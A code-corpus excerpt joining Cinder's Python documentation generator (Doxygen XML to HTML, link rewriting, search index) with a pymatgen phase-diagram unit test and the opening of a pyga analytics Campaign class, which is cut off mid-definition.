# link_title = "LINK TITLE"
# # link_url =
# link_tag = gen_link_tag(bs4, link_title)
def find_ci_tag_ref(link):
# get string to search against
searchstring = ""
if len(link.contents):
searchstring = link.contents[0]
if link.get('dox') is not None:
searchstring = link.get('dox')
ref_obj = None
is_function = searchstring.find("(") > -1 or link.get('kind') == 'function'
if is_function:
arg_string = searchstring[searchstring.find("("):]
if len(arg_string) == 0:
arg_string = "()"
try:
# find function link
if is_function:
fn_obj = g_symbolMap.find_function(searchstring, arg_string)
if fn_obj is not None:
ref_obj = fn_obj
# find enum link
elif link.get('kind') == 'enum':
enum_obj = g_symbolMap.find_enum(searchstring)
if enum_obj is not None:
ref_obj = enum_obj
# find class link
else:
existing_class = g_symbolMap.find_class(searchstring)
if existing_class is not None:
ref_obj = existing_class
else:
count = 0
# try a bunch of other things before giving up
while (ref_obj is None) and count < 3:
if count == 0:
ref_obj = g_symbolMap.find_namespace(searchstring)
elif count == 1:
ref_obj = g_symbolMap.find_function(searchstring)
elif count == 2:
ref_obj = g_symbolMap.find_enum(searchstring)
count += 1
except Exception as e:
log("problem finding ci tag", 1)
log(e.message, 1)
return None
return ref_obj
# ======================================================================================================== Link Updating
def path_join(path, link):
p = path.replace('\\', '/')
l = link.replace('\\', '/')
sep = '/' if not p.endswith('/') else ''
new_link = p + sep + l
return new_link
def get_path_dir(path):
path_parts = path.replace('\\', '/').split('/')
# if it doesn't end with a '/', lop off the last word
if not path.endswith('/'):
in_dir = '/'.join(path_parts[:-1]) + '/'
else:
in_dir = path
return in_dir
def update_links_abs(html, src_path):
"""
Replace all of the relative a links with absolut links
:param html:
:param src_path:
:param dest_path:
:return:
"""
# css links
for link in html.find_all("link"):
if link.has_attr("href"):
link["href"] = update_link_abs(link["href"], src_path)
# a links
for a in html.find_all("a"):
if a.has_attr("href"):
link_href = a["href"]
# if the link is an hpp file, lets link to the github link since we likely don't have it in our docs
if link_href.find(config.GLM_MODULE_CONFIG["source_file_ext"]) > -1:
a["href"] = config.GLM_MODULE_CONFIG["url_prefix"] + a.text
else:
a["href"] = update_link_abs(a["href"], src_path)
# script links
for script in html.find_all("script"):
if script.has_attr("src"):
script["src"] = update_link_abs(script["src"], src_path)
# images
for img in html.find_all("img"):
if img.has_attr("src"):
img["src"] = update_link_abs(img["src"], src_path)
# iframes
for iframe in html.find_all("iframe"):
if iframe.has_attr("src"):
link_src = iframe["src"]
if link_src.startswith('javascript') or link_src.startswith('http'):
return
new_link = update_link_abs(link_src, src_path)
iframe["src"] = new_link
def relative_url(in_path, link):
"""
Generates a relative url from a absolute destination directory
to an absolute file path
"""
index = 0
SEPARATOR = "/"
d = filter(None, in_path.replace('\\', SEPARATOR).split( SEPARATOR ))
s = filter(None, link.replace('\\', SEPARATOR).split( SEPARATOR ))
# FIND largest substring match
for i, resource in enumerate( d ):
if resource != s[i]:
break
index += 1
# remainder of source
s = s[index:]
backCount = len( d ) - index
path = "../" * backCount
path += SEPARATOR.join( s )
return path
def update_link_abs(link, in_path):
"""
Update the given link to point to something relative to the new path
:param link: The link to change
:param in_path: the original path to the file that the link lives in
:return:
"""
if link.startswith("http") or link.startswith("javascript:") or link.startswith("#"):
return link
SEPARATOR = "/"
in_path = in_path.replace('\\', SEPARATOR)
index = 0
backs = 0
# SPLIT the url into a list of path parts
r = in_path.split(SEPARATOR)
r = filter(None, r)
l = link.split(SEPARATOR)
l = filter(None, l)
# FIND largest substring match
for i, resource in enumerate( r ):
if resource != l[i]:
break
index += 1
# FIND the amount of back references
for j, back_ref in enumerate( l ):
if back_ref != "..":
break
backs += 1
if not index:
if backs > 0:
final = SEPARATOR.join(r[:backs*-1]) + SEPARATOR + SEPARATOR.join(l[backs:])
else:
final = SEPARATOR.join(r) + SEPARATOR + SEPARATOR.join(l)
else:
pre = r[:index]
post = l[index:]
final = SEPARATOR.join(pre) + SEPARATOR + SEPARATOR.join(post)
return final
def update_links(html, template_path, src_path, save_path):
"""
Replace all of the relative a links, js links and image links and make them relative to the outpath
:param html:
:param template_path:
:param dest_path:
:return:
"""
template_path = "/".join(template_path.replace('\\', '/').split('/'))
# css links
for link in html.find_all("link"):
if link.has_attr("href"):
link["href"] = update_link(link["href"], template_path, save_path)
# a links
for a in html.find_all("a"):
if a.has_attr("href"):
link_href = a["href"]
# if the link is an hpp file, lets link to the github link since we likely don't have it in our docs
if link_href.find(config.GLM_MODULE_CONFIG["source_file_ext"]) > -1:
a["href"] = config.GLM_MODULE_CONFIG["url_prefix"] + a.text
else:
a["href"] = update_link(a["href"], template_path, save_path)
# script links
for script in html.find_all("script"):
if script.has_attr("src"):
script["src"] = update_link(script["src"], template_path, save_path)
# images
for img in html.find_all("img"):
if img.has_attr("src"):
img["src"] = update_link(img["src"], template_path, save_path)
# iframes
for iframe in html.find_all("iframe"):
if iframe.has_attr("src"):
link_src = iframe["src"]
# on osx/unix
if os.sep == "/":
if not posixpath.isabs(link_src):
link_src = "/" + link_src
if link_src.startswith('javascript') or link_src.startswith('http'):
return
# base dir
src_base = src_path.split(BASE_PATH)[1].split(os.sep)[0]
dest_base = save_path.split(BASE_PATH)[1].split(os.sep)[0]
# get link of iframe source and replace in iframe
new_link = update_link(link_src, template_path, save_path)
iframe["src"] = new_link
# define the paths of file to copy and where to copy to
src_file = link_src
dest_file = link_src.replace(src_base, dest_base)
try:
# copy file as long as the source and destination is not the same
if SM(None, src_file, dest_file).ratio() < 1.0:
shutil.copy2(src_file, dest_file)
except IOError as e:
log("Cannot copy src_file because it doesn't exist: " + src_file, 2)
log(e.strerror, 2)
return
except Exception as e:
log("Cannot copy iframe over because of some other error", 2)
log(e.strerror)
return
def update_link(link, in_path, out_path):
"""
Update the given link to point to something relative to the new path
:param link: The link to change
:param in_path: the original path to the file that the link lives in
:return:
"""
if link.startswith("http") or link.startswith("javascript:") or link.startswith("#"):
return link
SEPARATOR = '/'
in_path = in_path.replace('\\', SEPARATOR)
out_path = out_path.replace('\\', SEPARATOR)
link = link.replace('\\', SEPARATOR)
base_path = BASE_PATH.replace('\\', SEPARATOR)
# if a relative path, make it absolute
if in_path.find(base_path) < 0:
in_path = base_path + in_path
# get absolute in path
abs_link_path = update_link_abs(link, in_path)
# convert to relative link in relation to the out path
src_base = in_path.split(base_path)[1].split(SEPARATOR)[0] # likely htmlsrc
dest_base = out_path.split(base_path)[1].split(SEPARATOR)[0] # htmlsrc or html
abs_dest = posixpath.dirname(out_path).replace('\\', SEPARATOR)
abs_link = abs_link_path.replace(src_base, dest_base)
# if not posixpath.isabs(abs_link):
# abs_link = "/" + abs_link
rel_link_path = relative_url(abs_dest, abs_link)
return rel_link_path
# =============================================================================================== File Utility Functions
def generate_bs4(file_path):
# tree = None
try:
with open(file_path, "rb") as html_file:
content = html_file.read().decode("utf-8", errors="replace")
new_content = content.encode("utf-8", errors="replace")
# wrap in body tag if none exists
if new_content.find("<body") < 0:
new_content = "<body>" + new_content + "</body>"
log("No body tag found in file: " + file_path)
bs4 = BeautifulSoup(new_content)
return bs4
except Exception as e:
log(e.message, 2)
return None
def generate_bs4_from_string(string):
# make sure it's a unicode object
if type(string) != unicode:
output_string = string.decode("utf-8", errors="replace")
else:
output_string = string
# wrap in body tag if none exists
if string.find("<body") < 0:
output_string = "<body>" + output_string + "</body>"
bs4 = BeautifulSoup(output_string)
return bs4
def get_symbol_to_file_map():
"""
Returns a dictionary from Cinder class name to file path
"""
log("generating symbol map from tag file", 0, True)
symbol_map = SymbolMap()
# find classes
class_tags = g_tag_xml.findall(r'compound/[@kind="class"]')
for c in class_tags:
class_obj = SymbolMap.Class(c)
name = class_obj.qualifiedName
# skip over blacklisted classes that belong to a blacklisted namespace
if any(name.find(blacklisted) > -1 for blacklisted in config.CLASS_LIST_BLACKLIST):
# print "SKIPPING " + name
continue
base_class = class_obj.base
symbol_map.classes[name] = class_obj
# find functions and add to symbol map
members = c.findall(r"member[@kind='function']")
for member in members:
# function_obj = SymbolMap.Function(fn_name, base_class, args, file_path)
function_obj = SymbolMap.Function(member, base_class)
# symbol_map.functions[name + "::" + function_obj.name] = function_obj
symbol_map.add_function(name, function_obj.name, function_obj)
class_obj.add_function(function_obj.name, function_obj)
# print "CLASS: " + name
# if name == "Iter":
# raise
# find enums
for member in c.findall(r"member/[@kind='enumeration']"):
pre = name + "::" if name is not None else ""
enum_name = pre + member.find("name").text
anchor = member.find("anchor").text
path = member.find("anchorfile").text + "#" + anchor
enum_obj = SymbolMap.Enum(enum_name, path)
symbol_map.enums[enum_name] = enum_obj
# find structs
struct_tags = g_tag_xml.findall(r'compound/[@kind="struct"]')
for s in struct_tags:
struct_obj = SymbolMap.Class(s)
name = struct_obj.qualifiedName
base_class = struct_obj.base
# skip over blacklisted classes that belong to a blacklisted namespace
if any(name.find(blacklisted) > -1 for blacklisted in config.CLASS_LIST_BLACKLIST):
log("SKIPPING " + name, 1)
continue
symbol_map.classes[name] = struct_obj
# find functions and add to symbol map
members = s.findall(r"member[@kind='function']")
for member in members:
# fn_name = member.find("name").text
# anchor = member.find("anchor").text
# file_path = member.find("anchorfile").text + "#" + anchor
# args = member.find("argsstring").text if member.find("argsstring") else ""
# function_obj = SymbolMap.Function(fn_name, base_class, args, file_path)
function_obj = SymbolMap.Function(member, base_class)
# symbol_map.functions[name + "::" + function_obj.name] = function_obj
symbol_map.add_function(name, function_obj.name, function_obj)
struct_obj.add_function(function_obj.name, function_obj)
# find namespaces
ns_tags = g_tag_xml.findall(r'compound/[@kind="namespace"]')
for ns in ns_tags:
namespace_name = ns.find('name').text
file_name = ns.find('filename').text
# skip namespaces with '@' in them
if namespace_name.find('@') > -1:
continue
# skip over blacklisted classes that belong to a blacklisted namespace
if config.is_namespace_blacklisted(namespace_name):
log("SKIPPING NAMESPACE: " + namespace_name, 1)
continue
ns_obj = SymbolMap.Namespace(namespace_name, file_name)
symbol_map.namespaces[namespace_name] = ns_obj
# process all typedefs in namespace
typedef_list = add_typedefs(ns.findall(r"member/[@kind='typedef']"), namespace_name, symbol_map)
ns_obj.typedefs = typedef_list
# find enums
for member in ns.findall(r"member/[@kind='enumeration']"):
name = namespace_name + "::" + member.find("name").text
# print "ENUM: " + name
anchor = member.find("anchor").text
path = member.find("anchorfile").text + "#" + anchor
enum_obj = SymbolMap.Enum(name, path)
symbol_map.enums[name] = enum_obj
# find functions and add to symbol map
members = ns.findall(r"member[@kind='function']")
for member in members:
function_obj = SymbolMap.Function(member, base_class)
ns_obj.functionList.append(function_obj)
ns_obj.add_function(function_obj.name, function_obj)
# find files
file_tags = g_tag_xml.findall(r'compound/[@kind="file"]')
for f in file_tags:
name = f.find('name').text
# filePath = f.find('path').text + f.find('filename').text
file_path = f.find('path').text + name
typedefs = []
# find typedefs for each file
for t in f.findall(r'member[@kind="typedef"]'):
td_name = t.find("name").text
type_name = t.find("type").text
type_path = t.find('anchorfile').text + "#" + t.find("anchor").text
typedef = SymbolMap.Typedef(td_name, type_name, type_path)
typedefs.append(typedef)
# print "FILE PATH: " + name + " | " + file_path
symbol_map.files[name] = SymbolMap.File(name, file_path, typedefs)
# find functions for each file
for member in f.findall(r'member[@kind="function"]'):
function_obj = SymbolMap.Function(member, "")
symbol_map.add_function("", function_obj.name, function_obj)
# find groups
group_tags = g_tag_xml.findall(r'compound/[@kind="group"]')
for member in group_tags:
group_obj = SymbolMap.Group(member)
subgroups = member.findall('subgroup')
# hardcode this for now since all groups are part of glm
ns = "glm"
# add subgroup names
if len(subgroups) > 0:
for subgroup in subgroups:
group_obj.subgroup_names.append(subgroup.text)
# find functions and add to symbol map
functions = member.findall(r"member[@kind='function']")
for function in functions:
function_obj = SymbolMap.Function(function, ns)
group_obj.add_function(function_obj.name, function_obj)
symbol_map.add_function(ns, function_obj.name, function_obj)
# find typedefs
typedefs = member.findall(r"member/[@kind='typedef']")
add_typedefs(typedefs, "glm", symbol_map)
symbol_map.groups[group_obj.name] = group_obj
# link up subgroups to parent groups
for group_names in symbol_map.groups:
group_obj = symbol_map.find_group(group_names)
if len(group_obj.subgroup_names) > 0:
# print group.name
for subgroup_name in group_obj.subgroup_names:
subgroup = symbol_map.find_group(subgroup_name)
group_obj.subgroups.append(subgroup)
if len(file_tags) == 0:
log("no compound of type 'file' found in tag file. Check doxygen SHOW_FILES setting.", 1)
return symbol_map
def add_typedefs(typedefs, ns_name, symbol_map):
typedef_list = []
# if ns_name == "cinder::gl"
for typdef in typedefs:
name = typdef.find("name").text
type_name = typdef.find("type").text
full_name = ns_name + "::" + name
shared_from_class = None
if type_name.startswith("class") > 0:
shared_from_class = symbol_map.find_class(type_name.split("class ")[1])
elif type_name.find("shared") > 0:
if type_name.find("class"):
shareds = re.findall(r"std::shared_ptr< (?:class)* *([\w]*) >", type_name)
else:
shareds = re.findall(r"std::shared_ptr< *([\w]*) >", type_name)
if len(shareds) > 0:
base = ns_name + "::" + shareds[0]
shared_from_class = symbol_map.find_class(base)
if not shared_from_class:
# find based on the string in type that's not explicitly a shared_ptr
# such as <type>SurfaceT< uint8_t ></type>
shareds = re.findall(r"([A-Za-z0-9]*)", type_name)
shared_from_class = symbol_map.find_class(shareds[0])
file_path = typdef.find('anchorfile').text + "#" + typdef.find("anchor").text
type_def_obj = SymbolMap.Typedef(name, type_name, file_path)
if shared_from_class is not None and type(shared_from_class) == SymbolMap.Class:
# if shared_from_class is not None:
type_def_obj.sharedFrom = shared_from_class
# let the class know that it has some typedefs associated with it
shared_from_class.add_type_def(type_def_obj)
symbol_map.typedefs[full_name] = type_def_obj
typedef_list.append(type_def_obj)
return typedef_list
def get_file_prefix(file_path):
return os.path.splitext(os.path.basename(file_path))[0]
def get_file_extension(file_path):
return os.path.splitext(os.path.basename(file_path))[1]
def get_file_name(file_path):
return os.path.basename(file_path)
def parse_xml(in_path):
"""
Opens the xml file and turns it into an ETree
:param in_path:
:return:
"""
# print "parse : " + in_path
tree = None
try:
with open(in_path, "rb") as xml_file:
content = xml_file.read().decode("utf-8", errors="replace")
new_content = content.encode("utf-8", errors="replace")
parser = ET.XMLParser(encoding="utf-8")
tree = ET.fromstring(new_content, parser)
except:
exc = sys.exc_info()[0]
log("COULD NOT PARSE FILE: " + in_path, 2)
log(exc, 2)
return tree
def write_html(bs4, save_path):
"""
Writes the html file to disk
:param bs4:
:param save_path:
:return:
"""
# prettify descriptions
for markup in bs4.find_all("div", "description"):
if type(markup) is Tag:
pretty = BeautifulSoup(markup.prettify())
if pretty is not None and markup is not None:
markup.replaceWith(pretty)
# convert entities in code blocks
for c in bs4.find_all("code"):
for child in c.children:
# replaces with escaped code
try:
child_utf = unicode(child).encode("utf-8", errors="replace")
child.replace_with(str(child_utf))
except Exception as e:
log("Writing HTML | " + str(e), 2)
# enode bs4, decode, and then re-encode and write
document = bs4.encode(formatter="html")
document = codecs.decode(document, "utf-8", "xmlcharrefreplace")
if not os.path.exists(os.path.dirname(save_path)):
os.makedirs(os.path.dirname(save_path))
with codecs.open(save_path, "w", "utf-8") as outFile:
outFile.write(document)
def write_search_index():
# save search index to js file
document = "var search_index_data = " + json.dumps(g_search_index).encode('utf-8')
# print document
if not os.path.exists(os.path.dirname(HTML_DEST_PATH + 'search_index.js')):
os.makedirs(os.path.dirname(HTML_DEST_PATH + 'search_index.js'))
with codecs.open(HTML_DEST_PATH + 'search_index.js', "w", "UTF-8") as outFile:
outFile.write(document)
def add_to_search_index(html, save_path, search_type, tags=[]):
"""
Adds the html page to the search index
:param html:
:param save_path:
:param search_type:
:param tags:
:return:
"""
global g_search_index
if not g_search_index:
g_search_index = {"data": []}
# creates new list from tags minus any dupes
search_list = list(set(tags))
search_obj = {"id": None, "title": None, "tags": []}
search_obj["id"] = len(g_search_index["data"])
search_obj["title"] = html.head.find("title").text if html.head.find("title") else ""
search_obj["link"] = save_path
search_obj["tags"] = search_list
search_obj["type"] = search_type
g_search_index["data"].append(search_obj)
def render_template(path, content):
"""
Generates a BeautifulSoup instance from the template and injects content
:param path:
:param content:
:return:
"""
# try:
# renderer = Renderer(file_encoding="utf-8", string_encoding="utf-8", decode_errors="xmlcharrefreplace")
# renderer.search_dirs.append(TEMPLATE_PATH)
# output = renderer.render_path(path, content)
# print content
# print path
# step 1: render content in template
content_renderer = Renderer(file_encoding="utf-8", string_encoding="utf-8", decode_errors="xmlcharrefreplace")
content_renderer.search_dirs.append(TEMPLATE_PATH)
output = content_renderer.render_path(path, content)
# step 2: place rendered content into main template
# - should have the following custom partials:
# - page title (define in object for page templates)
# - page content (rendered page content)
# - any other common partials that may lie outside the basic content area
# loader = Loader()
# template = loader.read("title")
# title_partial = loader.load_name(os.path.join(CLASS_TEMPLATE_DIR, "title"))
# except Exception as exc:
# print "\t**--------------------------------"
# print "\t** Warning: cannot render template"
# print "\t**--------------------------------"
# print exc
# print exc.message
# print(traceback.format_exc())
# exc_type, exc_obj, exc_tb = sys.exc_info()
# fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
# print(exc_type, fname, exc_tb.tb_lineno)
#
# if config.BREAK_ON_STOP_ERRORS:
# quit()
# else:
# return
bs4 = generate_bs4_from_string(output)
return bs4
def get_file_type(file_prefix):
"""
Determines the file type based on the file prefix
:param file_prefix: prefix in file name
:return: string indicating the type of file to parse
"""
if is_class_type(file_prefix):
return "class"
elif is_namespace_type(file_prefix):
return "namespace"
elif is_module_type(file_prefix):
return "module"
def is_class_type(class_str):
"""
Tests whether the filename is a class type
:param class_str:
:return: Boolean
"""
if any([class_str.startswith(prefix) for prefix in config.CLASS_FILE_PREFIXES]):
return True
return False
def is_namespace_type(ns_str):
"""
Tests whether the filename is a namespace type
:param class_str:
:return: ns_str
"""
if any([ns_str.startswith(prefix) for prefix in config.NAMESPACE_FILE_PREFIXES]):
return True
return False
def is_module_type(module_str):
"""
Tests whether the filename is a group type
:param module_str:
:return: Boolean
"""
if any([module_str.startswith(prefix) for prefix in config.GROUP_FILE_PREFIXES]):
return True
return False
def process_file(in_path, out_path=None):
""" Generate documentation for a single file
Args:
inPath: The file to process
outPath: The file to save the generated html file to
"""
file_path = in_path
file_prefix = get_file_prefix(file_path)
is_html_file = True if get_file_extension(file_path).lower() == ".html" else False
is_xml_file = True if get_file_extension(file_path).lower() == ".xml" else False
if is_html_file:
file_path = os.sep.join(in_path.split('htmlsrc'+os.sep)[1:])
save_path = out_path if out_path is not None else HTML_DEST_PATH + file_path
else:
save_path = out_path if out_path is not None else HTML_DEST_PATH + get_file_prefix(in_path) + ".html"
if is_html_file:
# print "process: " + HTML_SOURCE_PATH + file_path
process_html_file(HTML_SOURCE_PATH + file_path, save_path)
elif is_xml_file:
file_type = get_file_type(file_prefix)
# process html directory always, since they may generate content for class or namespace reference pages
if not state.processed_html_files and not args.skiphtml:
process_html_dir(HTML_SOURCE_PATH)
process_xml_file_definition(in_path, os.path.join(HTML_DEST_PATH, save_path), file_type)
def process_dir(in_path, out_path):
""" Iterates a directory and generates documentation for each xml file
in the directory as long as it is a class, struct or namespace
Args:
inPath: The directory to process
outPath: The directory to save the generated html file to
"""
for file_path in os.listdir(in_path):
full_path = os.path.join(in_path, file_path)
# if file_path.endswith(".xml"):
if os.path.isfile(full_path):
process_file(full_path)
elif os.path.isdir(full_path):
process_html_dir(full_path)
def process_html_dir(in_path):
global state
for path, subdirs, files in os.walk(in_path):
path_dir = path.split(os.sep)[-1]
if path_dir == "_templates" or path_dir == "assets":
continue
for name in files:
# file_prefix = get_file_prefix(name)
file_ext = get_file_extension(name).lower()
if file_ext == ".html":
if path.endswith(os.sep):
src_path = path[:-1]
else:
src_path = path
src_path = src_path + os.sep + name
process_file(src_path)
# add subnav for all guides that need them
# process_sub_nav()
state.processed_html_files = True
# def copyFiles( HTML_SOURCE_PATH, DOXYGEN_HTML_PATH ):
def copy_files():
src = HTML_SOURCE_PATH
dest = HTML_DEST_PATH
try:
copytree(src, dest, ignore=shutil.ignore_patterns("_templates*", "*.html"))
except OSError as e:
log('Directory not copied. Error:' + str(e))
# from http://stackoverflow.com/a/22331852/680667
def copytree(src, dst, symlinks=False, ignore=None):
""" Copies all of the files from the source directory
to a destination directory. Pass in anything that should be ignored.
"""
if not os.path.exists(dst):
os.makedirs(dst)
shutil.copystat(src, dst)
lst = os.listdir(src)
# make list of files and directories minus the ignored stuff
if ignore:
excl = ignore(src, lst)
lst = [x for x in lst if x not in excl]
for item in lst:
s = os.path.join(src, item)
d = os.path.join(dst, item)
if symlinks and os.path.islink(s):
if os.path.lexists(d):
os.remove(d)
os.symlink(os.readlink(s), d)
try:
st = os.lstat(s)
mode = stat.S_IMODE(st.st_mode)
os.lchmod(d, mode)
except:
pass # lchmod not available
elif os.path.isdir(s):
copytree(s, d, symlinks, ignore)
else:
shutil.copy2(s, d)
def load_meta():
global file_meta
# load meta file
meta_file = parse_xml(config.PROJECT_META_FILE)
# get doxygen version
file_meta["doxy_version"] = meta_file.attrib.get("version")
# get cinder version
for member in meta_file.findall(r'compounddef/sectiondef/memberdef[@kind="define"]'):
if member.find(r"name").text == "CINDER_VERSION_STR":
ver = str(member.find(r"initializer").text)
ver = ver.replace('"', "")
file_meta["cinder_version"] = ver
# get docs directory
file_meta["docs_root"] = args.root
# include google analytics
file_meta["include_analytics"] = args.include_analytics
def log(message, level=0, force=False):
if level == 0 or not level:
message_prefix = "INFO"
elif level == 1:
message_prefix = "WARNING"
elif level == 2:
message_prefix = "ERROR"
if args.debug or force:
print("\r *** " + message_prefix + ": [ " + message + " ] ***")
def log_progress(message):
sys.stdout.write('\r' + str(message))
sys.stdout.write("\033[K")
sys.stdout.flush()
if __name__ == "__main__":
""" Main Function for generating html documentation from doxygen generated xml files
Args:
- No arguments generates all Cinder docs. Expects Doxygen to have been run previously.
- Can pass in a single xml file to process by passing in path to xml file
and optionally, the resulting html file.
if no out path is supplied, outputs to DOXYGEN_HTML_PATH
Ex: python xmlToHtml.py xml/classcinder_1_1_surface_t.xml
- Can alternatively pass in a directory to process by providing the xml directory
Ex: python xmlToHtml.py xml/ html/
"""
args = parser.parse_args()
# Make sure we're compiling using pythong 2.7.6+
version_info = sys.version_info
#if version_info.major >= 2 and version_info.minor >= 7 and version_info.micro < 6:
# sys.exit("ERROR: Sorry buddy, you must use python 2.7.6+ to generate documentation. Visit https://www.python.org/downloads/ to download the latest.")
# if sys.version
if args.path:
inPath = args.path
if not os.path.isfile(inPath) and not os.path.isdir(inPath):
log("Nice try! Directory or file '" + inPath + "' doesn't even exist, so we're going to stop right... now!", True)
quit()
if not os.path.exists(TAG_FILE_PATH):
log("I got nothin' for you. The tag file [" + TAG_FILE_PATH + "] doesn't exist yet. "
"Run Doxygen first and try me again later.", 2, True)
quit()
# load meta data
load_meta()
# Load tag file
log("parsing tag file", 0, True)
g_tag_xml = ET.ElementTree(ET.parse(TAG_FILE_PATH).getroot())
# generate symbol map from tag file
g_symbolMap = get_symbol_to_file_map()
# copy files from htmlsrc/ to html/
log("copying files", 0, True)
copy_files()
# generate namespace navigation
g_namespaceNav = generate_namespace_nav()
log("processing files", 0, True)
if not args.path: # no args; run all docs
# process_html_dir(HTML_SOURCE_PATH, "html/")
process_dir("xml" + os.sep, "html" + os.sep)
# save search index to json file
write_search_index()
log("SUCCESSFULLY GENERATED CINDER DOCS!", 0, True)
elif args.path:
inPath = args.path
# process a specific file
if os.path.isfile(inPath):
process_file(inPath, args.outpath if len(sys.argv) > 2 else None)
log("SUCCESSFULLY GENERATED YOUR FILE!", 0, True)
elif os.path.isdir(inPath):
if inPath == "htmlsrc" + os.sep:
process_html_dir(HTML_SOURCE_PATH)
else:
process_dir(inPath, "html" + os.sep)
log("SUCCESSFULLY GENERATED YOUR FILES!", 0, True)
else:
log("Unknown usage", 1, True)
|
2666hz/Cinder
|
docs/generateDocs.py
|
Python
|
bsd-2-clause
| 127,835
|
[
"VisIt"
] |
e38e8d2fc92569e2780493242bdaa442e91c5b72eb7cfd018ab147be79d09b5c
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
from __future__ import unicode_literals
import unittest2 as unittest
import os
from numbers import Number
from pymatgen.core.composition import Composition
from pymatgen.core.periodic_table import Element
from pymatgen.phasediagram.maker import PhaseDiagram
from pymatgen.phasediagram.analyzer import PDAnalyzer
from pymatgen.phasediagram.entries import PDEntryIO, PDEntry
class PDAnalyzerTest(unittest.TestCase):
def setUp(self):
module_dir = os.path.dirname(os.path.abspath(__file__))
(elements, entries) = PDEntryIO.from_csv(os.path.join(module_dir,
"pdentries_test.csv"))
self.pd = PhaseDiagram(entries)
self.analyzer = PDAnalyzer(self.pd)
def test_get_e_above_hull(self):
for entry in self.pd.stable_entries:
self.assertLess(self.analyzer.get_e_above_hull(entry), 1e-11,
"Stable entries should have e above hull of zero!")
for entry in self.pd.all_entries:
if entry not in self.pd.stable_entries:
e_ah = self.analyzer.get_e_above_hull(entry)
self.assertGreaterEqual(e_ah, 0)
self.assertTrue(isinstance(e_ah, Number))
def test_get_equilibrium_reaction_energy(self):
for entry in self.pd.stable_entries:
self.assertLessEqual(
self.analyzer.get_equilibrium_reaction_energy(entry), 0,
"Stable entries should have negative equilibrium reaction energy!")
def test_get_decomposition(self):
for entry in self.pd.stable_entries:
self.assertEqual(len(self.analyzer.get_decomposition(entry.composition)), 1,
"Stable composition should have only 1 decomposition!")
dim = len(self.pd.elements)
for entry in self.pd.all_entries:
ndecomp = len(self.analyzer.get_decomposition(entry.composition))
self.assertTrue(ndecomp > 0 and ndecomp <= dim,
"The number of decomposition phases can at most be equal to the number of components.")
#Just to test decomp for a ficitious composition
ansdict = {entry.composition.formula: amt
for entry, amt in
self.analyzer.get_decomposition(Composition("Li3Fe7O11")).items()}
expected_ans = {"Fe2 O2": 0.0952380952380949,
"Li1 Fe1 O2": 0.5714285714285714,
"Fe6 O8": 0.33333333333333393}
for k, v in expected_ans.items():
self.assertAlmostEqual(ansdict[k], v)
def test_get_transition_chempots(self):
for el in self.pd.elements:
self.assertLessEqual(len(self.analyzer.get_transition_chempots(el)),
len(self.pd.facets))
def test_get_element_profile(self):
for el in self.pd.elements:
for entry in self.pd.stable_entries:
if not (entry.composition.is_element):
self.assertLessEqual(len(self.analyzer.get_element_profile(el, entry.composition)),
len(self.pd.facets))
def test_get_get_chempot_range_map(self):
elements = [el for el in self.pd.elements if el.symbol != "Fe"]
self.assertEqual(len(self.analyzer.get_chempot_range_map(elements)), 10)
def test_getmu_vertices_stability_phase(self):
results = self.analyzer.getmu_vertices_stability_phase(Composition("LiFeO2"), Element("O"))
self.assertAlmostEqual(len(results), 6)
test_equality = False
for c in results:
if abs(c[Element("O")]+7.115) < 1e-2 and abs(c[Element("Fe")]+6.596) < 1e-2 and \
abs(c[Element("Li")]+3.931) < 1e-2:
test_equality = True
self.assertTrue(test_equality,"there is an expected vertex missing in the list")
def test_getmu_range_stability_phase(self):
results = self.analyzer.get_chempot_range_stability_phase(
Composition("LiFeO2"), Element("O"))
self.assertAlmostEqual(results[Element("O")][1], -4.4501812249999997)
self.assertAlmostEqual(results[Element("Fe")][0], -6.5961470999999996)
self.assertAlmostEqual(results[Element("Li")][0], -3.6250022625000007)
def test_get_hull_energy(self):
for entry in self.pd.stable_entries:
h_e = self.analyzer.get_hull_energy(entry.composition)
self.assertAlmostEqual(h_e, entry.energy)
n_h_e = self.analyzer.get_hull_energy(entry.composition.fractional_composition)
self.assertAlmostEqual(n_h_e, entry.energy_per_atom)
def test_1d_pd(self):
entry = PDEntry('H', 0)
pd = PhaseDiagram([entry])
pda = PDAnalyzer(pd)
decomp, e = pda.get_decomp_and_e_above_hull(PDEntry('H', 1))
self.assertAlmostEqual(e, 1)
self.assertAlmostEqual(decomp[entry], 1.0)
if __name__ == '__main__':
unittest.main()
|
aykol/pymatgen
|
pymatgen/phasediagram/tests/test_pdanalyzer.py
|
Python
|
mit
| 5,113
|
[
"pymatgen"
] |
61f1b37a49f1e721a0d74ea6e6a513dbfaf1504c246078d65d9fc60e321c23fe
|
# -*- coding: utf-8 -*-
from datetime import datetime
from operator import itemgetter
from urlparse import urlparse
from urllib import unquote_plus
from pyga import utils
from pyga import exceptions
__author__ = "Arun KR (kra3) <the1.arun@gmail.com>"
__license__ = "Simplified BSD"
class Campaign(object):
'''
A representation of Campaign
Properties:
_type -- See TYPE_* constants, will be mapped to "__utmz" parameter.
creation_time -- Time of the creation of this campaign, will be mapped to "__utmz" parameter.
response_count -- Response Count, will be mapped to "__utmz" parameter.
Is also used to determine whether the campaign is new or repeated,
which will be mapped to "utmcn" and "utmcr" parameters.
id -- Campaign ID, a.k.a. "utm_id" query parameter for ga.js
Will be mapped to "__utmz" parameter.
source -- Source, a.k.a. "utm_source" query parameter for ga.js.
Will be mapped to "utmcsr" key in "__utmz" parameter.
g_click_id -- Google AdWords Click ID, a.k.a. "gclid" query parameter for ga.js.
Will be mapped to "utmgclid" key in "__utmz" parameter.
d_click_id -- DoubleClick (?) Click ID. Will be mapped to "utmdclid" key in "__utmz" parameter.
name -- Name, a.k.a. "utm_campaign" query parameter for ga.js.
Will be mapped to "utmccn" key in "__utmz" parameter.
medium -- Medium, a.k.a. "utm_medium" query parameter for ga.js.
Will be mapped to "utmcmd" key in "__utmz" parameter.
term -- Terms/Keywords, a.k.a. "utm_term" query parameter for ga.js.
Will be mapped to "utmctr" key in "__utmz" parameter.
content -- Ad Content Description, a.k.a. "utm_content" query parameter for ga.js.
Will be mapped to "utmcct" key in "__utmz" parameter.
'''
TYPE_DIRECT = 'direct'
TYPE_ORGANIC = 'organic'
TYPE_REFERRAL = 'referral'
CAMPAIGN_DELIMITER = '|'
UTMZ_PARAM_MAP = {
'utmcid': 'id',
'utmcsr': 'source',
'utmgclid': 'g_click_id',
'utmdclid': 'd_click_id',
'utmccn': 'name',
